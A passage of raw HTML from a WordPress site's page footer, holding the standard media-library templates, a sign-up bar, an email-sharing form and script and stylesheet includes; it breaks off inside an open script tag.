												<div class="mtsnb-button-type mtsnb-content"><span class="mtsnb-text">SIGN UP FOR MORE! Get special offers and updates from us in your inbox. </span><a href="https://lp.constantcontact.com/su/z2aEg7Y/expositoremail" class="mtsnb-button">Sign Up!</a></div>											</div>
										<a href="#" class="mtsnb-show" style="background-color:#d35151;color:#ffffff;"><span>+</span></a>					<a href="#" class="mtsnb-hide" style="background-color:#d35151;color:#ffffff;"><span>+</span></a>
									</div>
			</div>
					<script>
		( function ( body ) {
			'use strict';
			body.className = body.className.replace( /\btribe-no-js\b/, 'tribe-js' );
		} )( document.body );
		</script>
		<script> /* <![CDATA[ */var tribe_l10n_datatables = {"aria":{"sort_ascending":": activate to sort column ascending","sort_descending":": activate to sort column descending"},"length_menu":"Show _MENU_ entries","empty_table":"No data available in table","info":"Showing _START_ to _END_ of _TOTAL_ entries","info_empty":"Showing 0 to 0 of 0 entries","info_filtered":"(filtered from _MAX_ total entries)","zero_records":"No matching records found","search":"Search:","all_selected_text":"All items on this page were selected. ","select_all_link":"Select all pages","clear_selection":"Clear Selection.","pagination":{"all":"All","next":"Next","previous":"Previous"},"select":{"rows":{"0":"","_":": Selected %d rows","1":": Selected 1 row"}},"datepicker":{"dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesMin":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Prev","currentText":"Today","closeText":"Done","today":"Today","clear":"Clear"}};/* ]]> */ </script>
		<script type="text/html" id="tmpl-media-frame">
		<div class="media-frame-title" id="media-frame-title"></div>
		<h2 class="media-frame-menu-heading">Actions</h2>
		<button type="button" class="button button-link media-frame-menu-toggle" aria-expanded="false">
			Menu			<span class="dashicons dashicons-arrow-down" aria-hidden="true"></span>
		</button>
		<div class="media-frame-menu"></div>
		<div class="media-frame-tab-panel">
			<div class="media-frame-router"></div>
			<div class="media-frame-content"></div>
		</div>
		<h2 class="media-frame-actions-heading screen-reader-text">
		Selected media actions		</h2>
		<div class="media-frame-toolbar"></div>
		<div class="media-frame-uploader"></div>
	</script>

		<script type="text/html" id="tmpl-media-modal">
		<div tabindex="0" class="media-modal wp-core-ui" role="dialog" aria-labelledby="media-frame-title">
			<# if ( data.hasCloseButton ) { #>
				<button type="button" class="media-modal-close"><span class="media-modal-icon"><span class="screen-reader-text">Close dialog</span></span></button>
			<# } #>
			<div class="media-modal-content" role="document"></div>
		</div>
		<div class="media-modal-backdrop"></div>
	</script>

		<script type="text/html" id="tmpl-uploader-window">
		<div class="uploader-window-content">
			<div class="uploader-editor-title">Drop files to upload</div>
		</div>
	</script>

		<script type="text/html" id="tmpl-uploader-editor">
		<div class="uploader-editor-content">
			<div class="uploader-editor-title">Drop files to upload</div>
		</div>
	</script>

		<script type="text/html" id="tmpl-uploader-inline">
		<# var messageClass = data.message ? 'has-upload-message' : 'no-upload-message'; #>
		<# if ( data.canClose ) { #>
		<button class="close dashicons dashicons-no"><span class="screen-reader-text">Close uploader</span></button>
		<# } #>
		<div class="uploader-inline-content {{ messageClass }}">
		<# if ( data.message ) { #>
			<h2 class="upload-message">{{ data.message }}</h2>
		<# } #>
					<div class="upload-ui">
				<h2 class="upload-instructions drop-instructions">Drop files to upload</h2>
				<p class="upload-instructions drop-instructions">or</p>
				<button type="button" class="browser button button-hero">Select Files</button>
			</div>

			<div class="upload-inline-status"></div>

			<div class="post-upload-ui">
				
				<p class="max-upload-size">
				Maximum upload file size: 256 MB.				</p>

				<# if ( data.suggestedWidth && data.suggestedHeight ) { #>
					<p class="suggested-dimensions">
						Suggested image dimensions: {{data.suggestedWidth}} by {{data.suggestedHeight}} pixels.					</p>
				<# } #>

							</div>
				</div>
	</script>

		<script type="text/html" id="tmpl-media-library-view-switcher">
		<a href="/classified-sales-for-expositor/?mode=list" class="view-list">
			<span class="screen-reader-text">List View</span>
		</a>
		<a href="/classified-sales-for-expositor/?mode=grid" class="view-grid current" aria-current="page">
			<span class="screen-reader-text">Grid View</span>
		</a>
	</script>

		<script type="text/html" id="tmpl-uploader-status">
		<h2>Uploading</h2>
		<button type="button" class="button-link upload-dismiss-errors"><span class="screen-reader-text">Dismiss Errors</span></button>

		<div class="media-progress-bar"><div></div></div>
		<div class="upload-details">
			<span class="upload-count">
				<span class="upload-index"></span> / <span class="upload-total"></span>
			</span>
			<span class="upload-detail-separator">&ndash;</span>
			<span class="upload-filename"></span>
		</div>
		<div class="upload-errors"></div>
	</script>

		<script type="text/html" id="tmpl-uploader-status-error">
		<span class="upload-error-filename">{{{ data.filename }}}</span>
		<span class="upload-error-message">{{ data.message }}</span>
	</script>

		<script type="text/html" id="tmpl-edit-attachment-frame">
		<div class="edit-media-header">
			<button class="left dashicons"<# if ( ! data.hasPrevious ) { #> disabled<# } #>><span class="screen-reader-text">Edit previous media item</span></button>
			<button class="right dashicons"<# if ( ! data.hasNext ) { #> disabled<# } #>><span class="screen-reader-text">Edit next media item</span></button>
			<button type="button" class="media-modal-close"><span class="media-modal-icon"><span class="screen-reader-text">Close dialog</span></span></button>
		</div>
		<div class="media-frame-title"></div>
		<div class="media-frame-content"></div>
	</script>

		<script type="text/html" id="tmpl-attachment-details-two-column">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</script>

		<script type="text/html" id="tmpl-attachment">
		<div class="attachment-preview js--select-attachment type-{{ data.type }} subtype-{{ data.subtype }} {{ data.orientation }}">
			<div class="thumbnail">
				<# if ( data.uploading ) { #>
					<div class="media-progress-bar"><div style="width: {{ data.percent }}%"></div></div>
				<# } else if ( 'image' === data.type && data.sizes ) { #>
					<div class="centered">
						<img src="{{ data.size.url }}" draggable="false" alt="" />
					</div>
				<# } else { #>
					<div class="centered">
						<# if ( data.image && data.image.src && data.image.src !== data.icon ) { #>
							<img src="{{ data.image.src }}" class="thumbnail" draggable="false" alt="" />
						<# } else if ( data.sizes && data.sizes.medium ) { #>
							<img src="{{ data.sizes.medium.url }}" class="thumbnail" draggable="false" alt="" />
						<# } else { #>
							<img src="{{ data.icon }}" class="icon" draggable="false" alt="" />
						<# } #>
					</div>
					<div class="filename">
						<div>{{ data.filename }}</div>
					</div>
				<# } #>
			</div>
			<# if ( data.buttons.close ) { #>
				<button type="button" class="button-link attachment-close media-modal-icon"><span class="screen-reader-text">Remove</span></button>
			<# } #>
		</div>
		<# if ( data.buttons.check ) { #>
			<button type="button" class="check" tabindex="-1"><span class="media-modal-icon"></span><span class="screen-reader-text">Deselect</span></button>
		<# } #>
		<#
		var maybeReadOnly = data.can.save || data.allowLocalEdits ? '' : 'readonly';
		if ( data.describe ) {
			if ( 'image' === data.type ) { #>
				<input type="text" value="{{ data.caption }}" class="describe" data-setting="caption"
					aria-label="Caption"
					placeholder="Caption&hellip;" {{ maybeReadOnly }} />
			<# } else { #>
				<input type="text" value="{{ data.title }}" class="describe" data-setting="title"
					<# if ( 'video' === data.type ) { #>
						aria-label="Video title"
						placeholder="Video title&hellip;"
					<# } else if ( 'audio' === data.type ) { #>
						aria-label="Audio title"
						placeholder="Audio title&hellip;"
					<# } else { #>
						aria-label="Media title"
						placeholder="Media title&hellip;"
					<# } #> {{ maybeReadOnly }} />
			<# }
		} #>
	</script>

		<script type="text/html" id="tmpl-attachment-details">
		<h2>
			Attachment Details			<span class="settings-save-status" role="status">
				<span class="spinner"></span>
				<span class="saved">Saved.</span>
			</span>
		</h2>
		<div class="attachment-info">
			<div class="thumbnail thumbnail-{{ data.type }}">
				<# if ( data.uploading ) { #>
					<div class="media-progress-bar"><div></div></div>
				<# } else if ( 'image' === data.type && data.sizes ) { #>
					<img src="{{ data.size.url }}" draggable="false" alt="" />
				<# } else { #>
					<img src="{{ data.icon }}" class="icon" draggable="false" alt="" />
				<# } #>
			</div>
			<div class="details">
				<div class="filename">{{ data.filename }}</div>
				<div class="uploaded">{{ data.dateFormatted }}</div>

				<div class="file-size">{{ data.filesizeHumanReadable }}</div>
				<# if ( 'image' === data.type && ! data.uploading ) { #>
					<# if ( data.width && data.height ) { #>
						<div class="dimensions">
							{{ data.width }} by {{ data.height }} pixels						</div>
					<# } #>

					<# if ( data.can.save && data.sizes ) { #>
						<a class="edit-attachment" href="{{ data.editLink }}&amp;image-editor" target="_blank">Edit Image</a>
					<# } #>
				<# } #>

				<# if ( data.fileLength && data.fileLengthHumanReadable ) { #>
					<div class="file-length">Length:						<span aria-hidden="true">{{ data.fileLength }}</span>
						<span class="screen-reader-text">{{ data.fileLengthHumanReadable }}</span>
					</div>
				<# } #>

				<# if ( ! data.uploading && data.can.remove ) { #>
											<button type="button" class="button-link delete-attachment">Delete Permanently</button>
									<# } #>

				<div class="compat-meta">
					<# if ( data.compat && data.compat.meta ) { #>
						{{{ data.compat.meta }}}
					<# } #>
				</div>
			</div>
		</div>
		<# var maybeReadOnly = data.can.save || data.allowLocalEdits ? '' : 'readonly'; #>
		<# if ( 'image' === data.type ) { #>
			<span class="setting has-description" data-setting="alt">
				<label for="attachment-details-alt-text" class="name">Alt Text</label>
				<input type="text" id="attachment-details-alt-text" value="{{ data.alt }}" aria-describedby="alt-text-description" {{ maybeReadOnly }} />
			</span>
			<p class="description" id="alt-text-description"><a href="https://www.w3.org/WAI/tutorials/images/decision-tree" target="_blank" rel="noopener noreferrer">Describe the purpose of the image<span class="screen-reader-text"> (opens in a new tab)</span></a>. Leave empty if the image is purely decorative.</p>
		<# } #>
				<span class="setting" data-setting="title">
			<label for="attachment-details-title" class="name">Title</label>
			<input type="text" id="attachment-details-title" value="{{ data.title }}" {{ maybeReadOnly }} />
		</span>
				<# if ( 'audio' === data.type ) { #>
				<span class="setting" data-setting="artist">
			<label for="attachment-details-artist" class="name">Artist</label>
			<input type="text" id="attachment-details-artist" value="{{ data.artist || data.meta.artist || '' }}" />
		</span>
				<span class="setting" data-setting="album">
			<label for="attachment-details-album" class="name">Album</label>
			<input type="text" id="attachment-details-album" value="{{ data.album || data.meta.album || '' }}" />
		</span>
				<# } #>
		<span class="setting" data-setting="caption">
			<label for="attachment-details-caption" class="name">Caption</label>
			<textarea id="attachment-details-caption" {{ maybeReadOnly }}>{{ data.caption }}</textarea>
		</span>
		<span class="setting" data-setting="description">
			<label for="attachment-details-description" class="name">Description</label>
			<textarea id="attachment-details-description" {{ maybeReadOnly }}>{{ data.description }}</textarea>
		</span>
		<span class="setting" data-setting="url">
			<label for="attachment-details-copy-link" class="name">Copy Link</label>
			<input type="text" id="attachment-details-copy-link" value="{{ data.url }}" readonly />
		</span>
	</script>

		<script type="text/html" id="tmpl-media-selection">
		<div class="selection-info">
			<span class="count"></span>
			<# if ( data.editable ) { #>
				<button type="button" class="button-link edit-selection">Edit Selection</button>
			<# } #>
			<# if ( data.clearable ) { #>
				<button type="button" class="button-link clear-selection">Clear</button>
			<# } #>
		</div>
		<div class="selection-view"></div>
	</script>

		<script type="text/html" id="tmpl-attachment-display-settings">
		<h2>Attachment Display Settings</h2>

		<# if ( 'image' === data.type ) { #>
			<span class="setting align">
				<label for="attachment-display-settings-alignment" class="name">Alignment</label>
				<select id="attachment-display-settings-alignment" class="alignment"
					data-setting="align"
					<# if ( data.userSettings ) { #>
						data-user-setting="align"
					<# } #>>

					<option value="left">
						Left					</option>
					<option value="center">
						Center					</option>
					<option value="right">
						Right					</option>
					<option value="none" selected>
						None					</option>
				</select>
			</span>
		<# } #>

		<span class="setting">
			<label for="attachment-display-settings-link-to" class="name">
				<# if ( data.model.canEmbed ) { #>
					Embed or Link				<# } else { #>
					Link To				<# } #>
			</label>
			<select id="attachment-display-settings-link-to" class="link-to"
				data-setting="link"
				<# if ( data.userSettings && ! data.model.canEmbed ) { #>
					data-user-setting="urlbutton"
				<# } #>>

			<# if ( data.model.canEmbed ) { #>
				<option value="embed" selected>
					Embed Media Player				</option>
				<option value="file">
			<# } else { #>
				<option value="none" selected>
					None				</option>
				<option value="file">
			<# } #>
				<# if ( data.model.canEmbed ) { #>
					Link to Media File				<# } else { #>
					Media File				<# } #>
				</option>
				<option value="post">
				<# if ( data.model.canEmbed ) { #>
					Link to Attachment Page				<# } else { #>
					Attachment Page				<# } #>
				</option>
			<# if ( 'image' === data.type ) { #>
				<option value="custom">
					Custom URL				</option>
			<# } #>
			</select>
		</span>
		<span class="setting">
			<label for="attachment-display-settings-link-to-custom" class="name">URL</label>
			<input type="text" id="attachment-display-settings-link-to-custom" class="link-to-custom" data-setting="linkUrl" />
		</span>

		<# if ( 'undefined' !== typeof data.sizes ) { #>
			<span class="setting">
				<label for="attachment-display-settings-size" class="name">Size</label>
				<select id="attachment-display-settings-size" class="size" name="size"
					data-setting="size"
					<# if ( data.userSettings ) { #>
						data-user-setting="imgsize"
					<# } #>>
											<#
						var size = data.sizes['thumbnail'];
						if ( size ) { #>
							<option value="thumbnail" >
								Thumbnail &ndash; {{ size.width }} &times; {{ size.height }}
							</option>
						<# } #>
											<#
						var size = data.sizes['medium'];
						if ( size ) { #>
							<option value="medium" >
								Medium &ndash; {{ size.width }} &times; {{ size.height }}
							</option>
						<# } #>
											<#
						var size = data.sizes['large'];
						if ( size ) { #>
							<option value="large" >
								Large &ndash; {{ size.width }} &times; {{ size.height }}
							</option>
						<# } #>
											<#
						var size = data.sizes['full'];
						if ( size ) { #>
							<option value="full"  selected='selected'>
								Full Size &ndash; {{ size.width }} &times; {{ size.height }}
							</option>
						<# } #>
									</select>
			</span>
		<# } #>
	</script>

		<script type="text/html" id="tmpl-gallery-settings">
		<h2>Gallery Settings</h2>

		<span class="setting">
			<label for="gallery-settings-link-to" class="name">Link To</label>
			<select id="gallery-settings-link-to" class="link-to"
				data-setting="link"
				<# if ( data.userSettings ) { #>
					data-user-setting="urlbutton"
				<# } #>>

				<option value="post" <# if ( ! wp.media.galleryDefaults.link || 'post' == wp.media.galleryDefaults.link ) {
					#>selected="selected"<# }
				#>>
					Attachment Page				</option>
				<option value="file" <# if ( 'file' == wp.media.galleryDefaults.link ) { #>selected="selected"<# } #>>
					Media File				</option>
				<option value="none" <# if ( 'none' == wp.media.galleryDefaults.link ) { #>selected="selected"<# } #>>
					None				</option>
			</select>
		</span>

		<span class="setting">
			<label for="gallery-settings-columns" class="name select-label-inline">Columns</label>
			<select id="gallery-settings-columns" class="columns" name="columns"
				data-setting="columns">
									<option value="1" <#
						if ( 1 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						1					</option>
									<option value="2" <#
						if ( 2 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						2					</option>
									<option value="3" <#
						if ( 3 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						3					</option>
									<option value="4" <#
						if ( 4 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						4					</option>
									<option value="5" <#
						if ( 5 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						5					</option>
									<option value="6" <#
						if ( 6 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						6					</option>
									<option value="7" <#
						if ( 7 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						7					</option>
									<option value="8" <#
						if ( 8 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						8					</option>
									<option value="9" <#
						if ( 9 == wp.media.galleryDefaults.columns ) { #>selected="selected"<# }
					#>>
						9					</option>
							</select>
		</span>

		<span class="setting">
			<input type="checkbox" id="gallery-settings-random-order" data-setting="_orderbyRandom" />
			<label for="gallery-settings-random-order" class="checkbox-label-inline">Random Order</label>
		</span>

		<span class="setting size">
			<label for="gallery-settings-size" class="name">Size</label>
			<select id="gallery-settings-size" class="size" name="size"
				data-setting="size"
				<# if ( data.userSettings ) { #>
					data-user-setting="imgsize"
				<# } #>
				>
									<option value="thumbnail">
						Thumbnail					</option>
									<option value="medium">
						Medium					</option>
									<option value="large">
						Large					</option>
									<option value="full">
						Full Size					</option>
							</select>
		</span>
	</script>

		<script type="text/html" id="tmpl-playlist-settings">
		<h2>Playlist Settings</h2>

		<# var emptyModel = _.isEmpty( data.model ),
			isVideo = 'video' === data.controller.get('library').props.get('type'); #>

		<span class="setting">
			<input type="checkbox" id="playlist-settings-show-list" data-setting="tracklist" <# if ( emptyModel ) { #>
				checked="checked"
			<# } #> />
			<label for="playlist-settings-show-list" class="checkbox-label-inline">
				<# if ( isVideo ) { #>
				Show Video List				<# } else { #>
				Show Tracklist				<# } #>
			</label>
		</span>

		<# if ( ! isVideo ) { #>
		<span class="setting">
			<input type="checkbox" id="playlist-settings-show-artist" data-setting="artists" <# if ( emptyModel ) { #>
				checked="checked"
			<# } #> />
			<label for="playlist-settings-show-artist" class="checkbox-label-inline">
				Show Artist Name in Tracklist			</label>
		</span>
		<# } #>

		<span class="setting">
			<input type="checkbox" id="playlist-settings-show-images" data-setting="images" <# if ( emptyModel ) { #>
				checked="checked"
			<# } #> />
			<label for="playlist-settings-show-images" class="checkbox-label-inline">
				Show Images			</label>
		</span>
	</script>

		<script type="text/html" id="tmpl-embed-link-settings">
		<span class="setting link-text">
			<label for="embed-link-settings-link-text" class="name">Link Text</label>
			<input type="text" id="embed-link-settings-link-text" class="alignment" data-setting="linkText" />
		</span>
		<div class="embed-container" style="display: none;">
			<div class="embed-preview"></div>
		</div>
	</script>

		<script type="text/html" id="tmpl-embed-image-settings">
		<div class="wp-clearfix">
			<div class="thumbnail">
				<img src="{{ data.model.url }}" draggable="false" alt="" />
			</div>
		</div>

		<span class="setting alt-text has-description">
			<label for="embed-image-settings-alt-text" class="name">Alternative Text</label>
			<input type="text" id="embed-image-settings-alt-text" data-setting="alt" aria-describedby="alt-text-description" />
		</span>
		<p class="description" id="alt-text-description"><a href="https://www.w3.org/WAI/tutorials/images/decision-tree" target="_blank" rel="noopener noreferrer">Describe the purpose of the image<span class="screen-reader-text"> (opens in a new tab)</span></a>. Leave empty if the image is purely decorative.</p>

					<span class="setting caption">
				<label for="embed-image-settings-caption" class="name">Caption</label>
				<textarea id="embed-image-settings-caption" data-setting="caption" />
			</span>
		
		<fieldset class="setting-group">
			<legend class="name">Align</legend>
			<span class="setting align">
				<span class="button-group button-large" data-setting="align">
					<button class="button" value="left">
						Left					</button>
					<button class="button" value="center">
						Center					</button>
					<button class="button" value="right">
						Right					</button>
					<button class="button active" value="none">
						None					</button>
				</span>
			</span>
		</fieldset>

		<fieldset class="setting-group">
			<legend class="name">Link To</legend>
			<span class="setting link-to">
				<span class="button-group button-large" data-setting="link">
					<button class="button" value="file">
						Image URL					</button>
					<button class="button" value="custom">
						Custom URL					</button>
					<button class="button active" value="none">
						None					</button>
				</span>
			</span>
			<span class="setting">
				<label for="embed-image-settings-link-to-custom" class="name">URL</label>
				<input type="text" id="embed-image-settings-link-to-custom" class="link-to-custom" data-setting="linkUrl" />
			</span>
		</fieldset>
	</script>

		<script type="text/html" id="tmpl-image-details">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</script>

		<script type="text/html" id="tmpl-image-editor">
		<div id="media-head-{{ data.id }}"></div>
		<div id="image-editor-{{ data.id }}"></div>
	</script>

		<script type="text/html" id="tmpl-audio-details">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</script>

		<script type="text/html" id="tmpl-video-details">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</script>

		<script type="text/html" id="tmpl-editor-gallery">
		<# if ( data.attachments.length ) { #>
			<div class="gallery gallery-columns-{{ data.columns }}">
				<# _.each( data.attachments, function( attachment, index ) { #>
					<dl class="gallery-item">
						<dt class="gallery-icon">
							<# if ( attachment.thumbnail ) { #>
								<img src="{{ attachment.thumbnail.url }}" width="{{ attachment.thumbnail.width }}" height="{{ attachment.thumbnail.height }}" alt="{{ attachment.alt }}" />
							<# } else { #>
								<img src="{{ attachment.url }}" alt="{{ attachment.alt }}" />
							<# } #>
						</dt>
						<# if ( attachment.caption ) { #>
							<dd class="wp-caption-text gallery-caption">
								{{{ data.verifyHTML( attachment.caption ) }}}
							</dd>
						<# } #>
					</dl>
					<# if ( index % data.columns === data.columns - 1 ) { #>
						<br style="clear: both;">
					<# } #>
				<# } ); #>
			</div>
		<# } else { #>
			<div class="wpview-error">
				<div class="dashicons dashicons-format-gallery"></div><p>No items found.</p>
			</div>
		<# } #>
	</script>

		<script type="text/html" id="tmpl-crop-content">
		<img class="crop-image" src="{{ data.url }}" alt="Image crop area preview. Requires mouse interaction.">
		<div class="upload-errors"></div>
	</script>

		<script type="text/html" id="tmpl-site-icon-preview">
		<h2>Preview</h2>
		<strong aria-hidden="true">As a browser icon</strong>
		<div class="favicon-preview">
			<img src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-admin/images/browser.png" class="browser-preview" width="182" height="" alt="" />

			<div class="favicon">
				<img id="preview-favicon" src="{{ data.url }}" alt="Preview as a browser icon"/>
			</div>
			<span class="browser-title" aria-hidden="true"><# print( 'Sparta Live' ) #></span>
		</div>

		<strong aria-hidden="true">As an app icon</strong>
		<div class="app-icon-preview">
			<img id="preview-app-icon" src="{{ data.url }}" alt="Preview as an app icon"/>
		</div>
	</script>

	
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/spartalive.com\/classified-sales-for-expositor\/":20175151};
	</script>
					<div id="sharing_email" style="display: none;">
		<form action="/classified-sales-for-expositor/" method="post">
			<label for="target_email">Send to Email Address</label>
			<input type="email" name="target_email" id="target_email" value="" />

			
				<label for="source_name">Your Name</label>
				<input type="text" name="source_name" id="source_name" value="" />

				<label for="source_email">Your Email Address</label>
				<input type="email" name="source_email" id="source_email" value="" />

						<input type="text" id="jetpack-source_f_name" name="source_f_name" class="input" value="" size="25" autocomplete="off" title="This field is for validation and should not be changed" />
			
			<img style="float: right; display: none" class="loading" src="https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/jetpack/modules/sharedaddy/images/loading.gif" alt="loading" width="16" height="16" />
			<input type="submit" value="Send Email" class="sharing_send" />
			<a rel="nofollow" href="#cancel" class="sharing_cancel" role="button">Cancel</a>

			<div class="errors errors-1" style="display: none;">
				Post was not sent - check your email addresses!			</div>

			<div class="errors errors-2" style="display: none;">
				Email check failed, please try again			</div>

			<div class="errors errors-3" style="display: none;">
				Sorry, your blog cannot share posts by email.			</div>
		</form>
	</div>
<link rel='stylesheet' id='ws_bootsrap_css-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/wp-future-clone/modules/inc/assets/css/boot-cont.css?ver=5.3.2&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='buttons-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/css/buttons.min.css?ver=5.3.2&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/css/dashicons.min.css?ver=5.3.2&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='mediaelement-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.13-9993131&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='wp-mediaelement-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=5.3.2&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='media-views-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/css/media-views.min.css?ver=5.3.2&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='imgareaselect-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/imgareaselect/imgareaselect.css?ver=0.9.8&#038;time=1578960340' type='text/css' media='all' />
<link rel='stylesheet' id='ws_front_css-css'  href='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/wp-future-clone/modules/css/front.css?ver=5.3.2&#038;time=1578960340' type='text/css' media='all' />
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=202003'></script>
<script src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-before.js'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/underscore.min.js?ver=1.8.3&#038;time=1578960340'></script>
<script src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-content/plugins/the-events-calendar/common/src/resources/js/underscore-after.js'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/shortcode.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/backbone.min.js?ver=1.4.0&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpUtilSettings = {"ajax":{"url":"\/wp-admin\/admin-ajax.php"}};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/wp-util.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/wp-backbone.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var _wpMediaModelsL10n = {"settings":{"ajaxurl":"\/wp-admin\/admin-ajax.php","post":{"id":0}}};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/media-models.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var pluploadL10n = {"queue_limit_exceeded":"You have attempted to queue too many files.","file_exceeds_size_limit":"%s exceeds the maximum upload size for this site.","zero_byte_file":"This file is empty. Please try another.","invalid_filetype":"Sorry, this file type is not permitted for security reasons.","not_an_image":"This file is not an image. Please try another.","image_memory_exceeded":"Memory exceeded. Please try another smaller file.","image_dimensions_exceeded":"This is larger than the maximum size. Please try another.","default_error":"An error occurred in the upload. Please try again later.","missing_upload_url":"There was a configuration error. Please contact the server administrator.","upload_limit_exceeded":"You may only upload 1 file.","http_error":"Unexpected response from the server. The file may have been uploaded successfully. Check in the Media Library or reload the page.","http_error_image":"Post-processing of the image failed. If this is a photo or a large image, please scale it down to 2500 pixels and upload it again.","upload_failed":"Upload failed.","big_upload_failed":"Please try uploading this file with the %1$sbrowser uploader%2$s.","big_upload_queued":"%s exceeds the maximum upload size for the multi-file uploader when used in your browser.","io_error":"IO error.","security_error":"Security error.","file_cancelled":"File canceled.","upload_stopped":"Upload stopped.","dismiss":"Dismiss","crunching":"Crunching\u2026","deleted":"moved to the trash.","error_uploading":"\u201c%s\u201d has failed to upload."};
var _wpPluploadSettings = {"defaults":{"file_data_name":"async-upload","url":"\/wp-admin\/async-upload.php","filters":{"max_file_size":"268435456b","mime_types":[{"extensions":"jpg,jpeg,jpe,gif,png,bmp,tiff,tif,ico,asf,asx,wmv,wmx,wm,avi,divx,flv,mov,qt,mpeg,mpg,mpe,mp4,m4v,ogv,webm,mkv,3gp,3gpp,3g2,3gp2,txt,asc,c,cc,h,srt,csv,tsv,ics,rtx,css,vtt,dfxp,mp3,m4a,m4b,aac,ra,ram,wav,ogg,oga,flac,mid,midi,wma,wax,mka,rtf,pdf,class,tar,zip,gz,gzip,rar,7z,psd,xcf,doc,pot,pps,ppt,wri,xla,xls,xlt,xlw,mdb,mpp,docx,docm,dotx,dotm,xlsx,xlsm,xlsb,xltx,xltm,xlam,pptx,pptm,ppsx,ppsm,potx,potm,ppam,sldx,sldm,onetoc,onetoc2,onetmp,onepkg,oxps,xps,odt,odp,ods,odg,odc,odb,odf,wp,wpd,key,numbers,pages"}]},"multipart_params":{"action":"upload-attachment","_wpnonce":"c322b72c7c"}},"browser":{"mobile":false,"supported":true},"limitExceeded":false};
/* ]]> */
</script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/plupload/wp-plupload.min.js?ver=5.3.2&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4&#038;time=1578960340'></script>
<script type='text/javascript' src='https://secureservercdn.net/184.168.47.225/e6a.675.myftpupload.com/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4&#038;time=1578960340'></script>
<script type='text/javascript'>
